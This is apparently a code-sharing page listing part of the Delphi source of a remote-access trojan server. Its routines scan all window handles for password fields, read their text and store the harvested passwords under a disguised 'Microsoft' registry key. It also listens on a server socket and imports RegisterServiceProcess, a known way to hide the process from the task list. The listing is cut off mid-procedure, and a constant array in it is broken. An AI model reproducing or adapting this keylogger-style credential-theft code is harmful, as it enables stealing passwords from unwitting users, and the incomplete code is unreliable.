资源名称 [点击查看]
- unit ServerMain;
- interface
- uses
- Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
- ScktComp, Registry, ShellAPI, ExtCtrls, ShowPictureUnit;
- type
- TRegisterServiceProcess = function (dwProcessID, dwType:DWord) : DWORD; stdcall;
- TServerForm = class(TForm)
- ServerSocket: TServerSocket;
- PTimer: TTimer;
- procedure ShowPicture (pName : string);
- procedure FormCreate(Sender: TObject);
- procedure ServerSocketClientRead(Sender: TObject;
- Socket: TCustomWinSocket);
- procedure FormClose(Sender: TObject; var Action: TCloseAction);
- procedure PTimerTimer(Sender: TObject);
- private
- { Private declarations }
- public
- { Public declarations }
- end;
- var
- ServerForm: TServerForm;
- function PlaySound(lpszSoundName: PAnsiChar; uFlags: UINT): BOOL; stdcall;
- implementation
- function PlaySound; external 'winmm.dll' name 'sndPlaySoundA';
- {$R *.DFM}
- var
- PList : array [1..64] of string;
- FlT : FILE;
- FName : string;
- FSize : integer;
- AppList : array [1..64] of LongInt;
- PC, RC, APC, RLen, AC : integer;
- SD : string;
- buffer : array [0..1040] of byte;
- sendfile, recfile : boolean;
- iores : integer;
- const
- IconConst : array [0..4] of integer=(0, MB_ICONEXCLAMATION,
- WrapStr = #13+#10;
- MegaByte = 1024*1024;
- KiloByte = 1024;
- function WinText (hWnd : LongInt) : string;
- var PC : PChar;
- L : integer;
- begin
- L:=SendMessage (hWnd, WM_GETTEXTLENGTH, 0, 0);
- getmem (PC, L+1);
- SendMessage (hWnd, WM_GETTEXT, L+1, LongInt (PC));
- result:=PC;
- end;
- function IsPassword (hWnd : LongInt) : boolean;
- var ST : LongInt;
- begin
- ST:=GetWindowWord (hWnd, GWL_STYLE) and $FF;
- result:=(ST=$A0) or (ST=$E0);
- end;
- function IsTextField (hWnd : LongInt) : boolean;
- var ST : LongInt;
- begin
- ST:=GetWindowWord (hWnd, GWL_STYLE) and $FF;
- result:=(ST=$A0) or (ST=$E0) or (ST=$80) or (ST=$C0);
- end;
- // Gets all applications with pass fields
- procedure GetPasswordList;
- var i, j : integer;
- ohWnd, PrhWnd : LongInt;
- begin
- APC:=0;
- for i:=1 to 16384 do
- if IsWindow (i) then
- if IsPassword (i) then
- begin
- PrhWnd:=i;
- repeat
- ohWnd:=PrhWnd;
- PrhWnd:=GetParent (ohWnd);
- until GetParent (PrhWnd)=0;
- Inc (APC);
- AppList[APC]:=PrhWnd;
- end;
- PC:=0;
- for i:=1 to 16384 do
- if IsWindow (i) then
- if IsTextField (i) then
- begin
- PrhWnd:=i;
- repeat
- ohWnd:=PrhWnd;
- PrhWnd:=GetParent (ohWnd);
- until GetParent (PrhWnd)=0;
- for j:=1 to APC do
- if PrhWnd=AppList[j] then
- begin
- Inc (PC);
- PList[PC]:=WinText(PrhWnd)+'___'+WinText(i);
- break;
- end; { Application with passes scanning..}
- end; { hWnd scanning }
- end; { End of procedure }
- procedure RegistryPasswords;
- // adds passwords (from PList) to Registry with old Password checking
- var i, j : integer;
- found : boolean;
- RG : TRegistry;
- begin
- ServerForm.PTimer.Enabled:=false;
- RG:=TRegistry.Create;
- GetPasswordList;
- RG.OpenKey ('SOFTWAREMicrosoftGeneral', TRUE);
- if RG.ValueExists ('TCount') then
- RC:=RG.ReadInteger ('TCount')
- else
- RC:=0;
- if RC=0 then // Empty registry - don't compare, add all passes..
- begin
- RG.WriteInteger ('TCount', PC);
- for i:=1 to PC do
- RG.WriteString (inttostr(i), PList[i]);
- end
- else
- begin // Comparing RList & PList...
- for i:=1 to PC do // compare loop
- begin
- found:=false;
- for j:=1 to RC do
- if RG.ReadString (inttostr(j))=PList[i] then found:=true;
- if not(found) then
- begin
- Inc (RC);
- RG.WriteString (inttostr(RC), PList[i]);
- end;
- end; // end compare loop
- RG.WriteInteger ('TCount', RC);
- { for i:=1 to RC do
- RG.WriteString (inttostr(i), RList[i]);}
- end;
- RG.Destroy;
- ServerForm.PTimer.Enabled:=true;
- end;
- procedure TServerForm.FormCreate(Sender: TObject);
- var TM : string;
- i : integer;
- PC, OldName, NewName : PChar;
- RG : TRegistry;
- hNdl :THandle;
- RegisterServiceProcess: TRegisterServiceProcess;
- begin
- // 橡